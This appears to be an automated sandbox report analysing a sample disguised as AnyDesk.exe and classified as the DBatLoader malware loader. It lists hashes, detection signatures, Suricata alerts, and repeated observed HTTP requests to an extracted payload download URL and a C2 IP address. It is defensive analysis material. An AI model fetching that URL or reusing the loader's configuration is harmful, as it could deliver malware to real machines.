Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AnyDesk.exe

Overview

General Information

Sample name:AnyDesk.exe
Analysis ID:1562860
MD5:bceea9753420a675af68cda43864438e
SHA1:0823f156da4f106a26b5738cf9f732d5dd68cdd8
SHA256:b6a6a59c8b8387233be03bb2111830d4e8aafec6a62a290090ae75cbff5736ec
Tags:doganalecmdexeuser-JAMESWT_MHT
Infos:

Detection

DBatLoader
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • AnyDesk.exe (PID: 6084 cmdline: "C:\Users\user\Desktop\AnyDesk.exe" MD5: BCEEA9753420A675AF68CDA43864438E)
  • cleanup
{"Download Url": ["https://vandeytas.ru.com/233_Hlvzmhuinff"]}
SourceRuleDescriptionAuthorStrings
00000000.00000003.2120740305.000000007F880000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
    SourceRuleDescriptionAuthorStrings
    0.2.AnyDesk.exe.2b20000.0.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-26T08:11:09.360851+010020283713Unknown Traffic192.168.2.64970850.7.187.218443TCP
      2024-11-26T08:11:11.638736+010020283713Unknown Traffic192.168.2.64971150.7.187.218443TCP
      2024-11-26T08:11:13.914572+010020283713Unknown Traffic192.168.2.64971350.7.187.218443TCP
      2024-11-26T08:11:16.082568+010020283713Unknown Traffic192.168.2.64971550.7.187.218443TCP
      2024-11-26T08:11:18.223134+010020283713Unknown Traffic192.168.2.64971850.7.187.218443TCP
      2024-11-26T08:11:20.675162+010020283713Unknown Traffic192.168.2.64972550.7.187.218443TCP
      2024-11-26T08:11:22.868570+010020283713Unknown Traffic192.168.2.64973350.7.187.218443TCP
      2024-11-26T08:11:25.014735+010020283713Unknown Traffic192.168.2.64974250.7.187.218443TCP
      2024-11-26T08:11:27.172305+010020283713Unknown Traffic192.168.2.64974950.7.187.218443TCP
      2024-11-26T08:11:29.389804+010020283713Unknown Traffic192.168.2.64975650.7.187.218443TCP
      2024-11-26T08:11:31.526426+010020283713Unknown Traffic192.168.2.64976350.7.187.218443TCP
      2024-11-26T08:11:33.621699+010020283713Unknown Traffic192.168.2.64977050.7.187.218443TCP
      2024-11-26T08:11:35.800978+010020283713Unknown Traffic192.168.2.64977850.7.187.218443TCP
      2024-11-26T08:11:38.069883+010020283713Unknown Traffic192.168.2.64978550.7.187.218443TCP
      2024-11-26T08:11:40.254348+010020283713Unknown Traffic192.168.2.64979250.7.187.218443TCP
      2024-11-26T08:11:42.434121+010020283713Unknown Traffic192.168.2.64979950.7.187.218443TCP
      2024-11-26T08:11:44.605823+010020283713Unknown Traffic192.168.2.64980650.7.187.218443TCP
      2024-11-26T08:11:46.781097+010020283713Unknown Traffic192.168.2.64981250.7.187.218443TCP
      2024-11-26T08:11:48.955453+010020283713Unknown Traffic192.168.2.64981950.7.187.218443TCP
      2024-11-26T08:11:51.142931+010020283713Unknown Traffic192.168.2.64982650.7.187.218443TCP
      2024-11-26T08:11:53.230697+010020283713Unknown Traffic192.168.2.64983350.7.187.218443TCP
      2024-11-26T08:11:55.382503+010020283713Unknown Traffic192.168.2.64983950.7.187.218443TCP
      2024-11-26T08:11:57.469838+010020283713Unknown Traffic192.168.2.64984550.7.187.218443TCP
      2024-11-26T08:11:59.684835+010020283713Unknown Traffic192.168.2.64985250.7.187.218443TCP
      2024-11-26T08:12:01.895489+010020283713Unknown Traffic192.168.2.64985950.7.187.218443TCP
      2024-11-26T08:12:03.977085+010020283713Unknown Traffic192.168.2.64986750.7.187.218443TCP
      2024-11-26T08:12:06.305080+010020283713Unknown Traffic192.168.2.64987450.7.187.218443TCP
      2024-11-26T08:12:08.798340+010020283713Unknown Traffic192.168.2.64988050.7.187.218443TCP
      2024-11-26T08:12:10.965822+010020283713Unknown Traffic192.168.2.64988750.7.187.218443TCP
      2024-11-26T08:12:13.341006+010020283713Unknown Traffic192.168.2.64989450.7.187.218443TCP
      2024-11-26T08:12:15.494269+010020283713Unknown Traffic192.168.2.64990150.7.187.218443TCP
      2024-11-26T08:12:17.724462+010020283713Unknown Traffic192.168.2.64990850.7.187.218443TCP
      2024-11-26T08:12:19.929032+010020283713Unknown Traffic192.168.2.64991550.7.187.218443TCP
      2024-11-26T08:12:22.115166+010020283713Unknown Traffic192.168.2.64992250.7.187.218443TCP
      2024-11-26T08:12:24.245099+010020283713Unknown Traffic192.168.2.64992950.7.187.218443TCP
      2024-11-26T08:12:26.450205+010020283713Unknown Traffic192.168.2.64993650.7.187.218443TCP
      2024-11-26T08:12:28.625681+010020283713Unknown Traffic192.168.2.64994350.7.187.218443TCP
      2024-11-26T08:12:30.796189+010020283713Unknown Traffic192.168.2.64995050.7.187.218443TCP
      2024-11-26T08:12:32.969436+010020283713Unknown Traffic192.168.2.64995750.7.187.218443TCP
      2024-11-26T08:12:35.120345+010020283713Unknown Traffic192.168.2.64996450.7.187.218443TCP
      2024-11-26T08:12:37.475728+010020283713Unknown Traffic192.168.2.64997150.7.187.218443TCP
      2024-11-26T08:12:39.583563+010020283713Unknown Traffic192.168.2.64997950.7.187.218443TCP
      2024-11-26T08:12:41.748298+010020283713Unknown Traffic192.168.2.64998650.7.187.218443TCP
      2024-11-26T08:12:43.888557+010020283713Unknown Traffic192.168.2.64999350.7.187.218443TCP
      2024-11-26T08:12:46.022721+010020283713Unknown Traffic192.168.2.65000050.7.187.218443TCP
      2024-11-26T08:12:48.152774+010020283713Unknown Traffic192.168.2.65000750.7.187.218443TCP
      2024-11-26T08:12:50.278727+010020283713Unknown Traffic192.168.2.65001450.7.187.218443TCP
      2024-11-26T08:12:52.422056+010020283713Unknown Traffic192.168.2.65002050.7.187.218443TCP
      2024-11-26T08:12:54.490537+010020283713Unknown Traffic192.168.2.65002750.7.187.218443TCP
      2024-11-26T08:12:56.649069+010020283713Unknown Traffic192.168.2.65003350.7.187.218443TCP
      2024-11-26T08:12:58.769830+010020283713Unknown Traffic192.168.2.65004050.7.187.218443TCP
      2024-11-26T08:13:00.903306+010020283713Unknown Traffic192.168.2.65004750.7.187.218443TCP
      2024-11-26T08:13:03.301313+010020283713Unknown Traffic192.168.2.65005450.7.187.218443TCP
      2024-11-26T08:13:05.421743+010020283713Unknown Traffic192.168.2.65006150.7.187.218443TCP
      2024-11-26T08:13:07.488315+010020283713Unknown Traffic192.168.2.65006550.7.187.218443TCP
      2024-11-26T08:13:09.615877+010020283713Unknown Traffic192.168.2.65007250.7.187.218443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: AnyDesk.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://vandeytas.ru.com/233_Hlvzmhuinff"]}
      Source: AnyDesk.exeReversingLabs: Detection: 65%
      Source: AnyDesk.exeVirustotal: Detection: 31%Perma Link
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
      Source: AnyDesk.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49708 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49713 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49718 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49725 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49749 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49756 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49763 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49770 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49778 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49785 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49792 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49799 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49806 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49812 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49819 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49826 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49833 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49839 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49845 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49852 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49859 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49867 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49874 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49880 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49887 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49894 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49901 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49908 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49915 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49922 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49929 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49936 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49943 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49950 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49957 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49964 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49971 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49979 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49986 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:49993 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50000 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50007 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50014 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50020 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50027 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50033 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50040 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50047 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50054 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50061 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50065 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 50.7.187.218:443 -> 192.168.2.6:50072 version: TLS 1.2
      Source: Binary string: easinvoker.pdb source: AnyDesk.exe, AnyDesk.exe, 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2120740305.000000007F880000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2119845710.000000007FA90000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: easinvoker.pdbGCTL source: AnyDesk.exe, 00000000.00000003.2120469469.00000000027D1000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3368038850.0000000002A0B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2120740305.000000007F880000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2119845710.000000007FA90000.00000004.00001000.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B25908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02B25908

      Networking

      barindex
      Source: Malware configuration extractorURLs: https://vandeytas.ru.com/233_Hlvzmhuinff
      Source: C:\Users\user\Desktop\AnyDesk.exeCode function: 0_2_02B3E4B8 InternetCheckConnectionA,0_2_02B3E4B8
      Source: Joe Sandbox ViewIP Address: 50.7.187.218 50.7.187.218
      Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49708 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49713 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49725 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49718 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49711 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49770 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49742 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49778 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49785 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49763 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49799 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49812 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49715 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49806 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49833 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49839 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49733 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49845 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49880 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49874 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49859 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49887 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49749 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49756 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49792 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49901 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49826 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49915 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49922 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49936 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49950 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49957 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49943 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49852 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49819 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49867 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49964 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49971 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49979 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49986 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49993 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49929 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50000 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49894 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50007 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50014 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50020 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50033 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49908 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50047 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50027 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50040 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50054 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50061 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50072 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50065 -> 50.7.187.218:443
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
